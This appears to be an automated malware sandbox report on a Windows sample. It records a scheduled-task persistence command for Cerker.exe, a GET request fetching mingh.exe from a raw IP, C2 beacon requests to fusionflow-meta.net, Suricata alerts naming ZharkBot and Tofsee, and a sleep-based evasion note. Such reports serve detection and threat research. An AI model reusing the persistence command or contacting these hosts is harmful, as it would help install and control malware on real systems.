Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | Aug. 9, 2024, 7:47 a.m. | Aug. 9, 2024, 7:51 a.m. |
Process | Command line | PID |
---|---|---|
schtasks.exe | C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe" /F | 2608 |
schtasks.exe | C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe" /F | 2768 |
Name | Response | Post-Analysis Lookup |
---|---|---|
fusionflow-meta.net | 172.67.162.233 | |
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.101:49165 -> 104.21.74.211:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49167 -> 104.21.74.211:443 | 906200054 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.101:49166 -> 185.216.214.225:80 | 2054413 | ET MALWARE ZharkBot User-Agent Observed | A Network Trojan was detected |
TCP 192.168.56.101:49166 -> 185.216.214.225:80 | 2016141 | ET INFO Executable Download from dotted-quad Host | Potentially Bad Traffic |
TCP 185.216.214.225:80 -> 192.168.56.101:49166 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 185.216.214.225:80 -> 192.168.56.101:49166 | 2021076 | ET HUNTING SUSPICIOUS Dotted Quad Host MZ Response | Potentially Bad Traffic |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.101:49165 -> 104.21.74.211:443 | C=US, O=Google Trust Services, CN=WE1 | CN=fusionflow-meta.net | 28:87:5e:df:6f:c5:23:cc:f0:fe:2d:3f:82:ec:0e:5a:e1:e2:4b:2a |
TLSv1 192.168.56.101:49167 -> 104.21.74.211:443 | C=US, O=Google Trust Services, CN=WE1 | CN=fusionflow-meta.net | 28:87:5e:df:6f:c5:23:cc:f0:fe:2d:3f:82:ec:0e:5a:e1:e2:4b:2a |
Field | Value |
---|---|
suspicious_features | Connection to IP address |
suspicious_request | GET http://185.216.214.225/mingh.exe |
request | GET http://185.216.214.225/mingh.exe |
request | GET https://fusionflow-meta.net/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7 |
request | GET https://fusionflow-meta.net/socket/?id=5BCCD56859158D5509DEF6EE93BD1D99E583188F0C221CF3349EDF15382DB8F4&us=1ACC94780D1E&mn=3AECB4580D1EC6312C&os=39C08968505B9841589FC5AB9AE31E8EF2DC42D055785DDC&bld=2DC8936D5355B11500CDF4E3C4AB49D3B4F7&tsk=5F9BD4 |
description | Cerker.exe tried to sleep 230 seconds, actually delayed analysis time by 230 seconds |
file | C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe |
cmdline | C:\Windows\System32\schtasks.exe /Create /SC MINUTE /MO 1 /TN Cerker.exe /TR "C:\Users\test22\AppData\Local\Temp\349587345342\Cerker.exe" /F |
file | C:\ProgramData\FRaqbC8wSA1XvpFVjCRGryWt.exe |
wmi | SELECT * FROM Win32_Processor |
wmi | SELECT * FROM Win32_BaseBoard |
wmi | SELECT * FROM Win32_DiskDrive |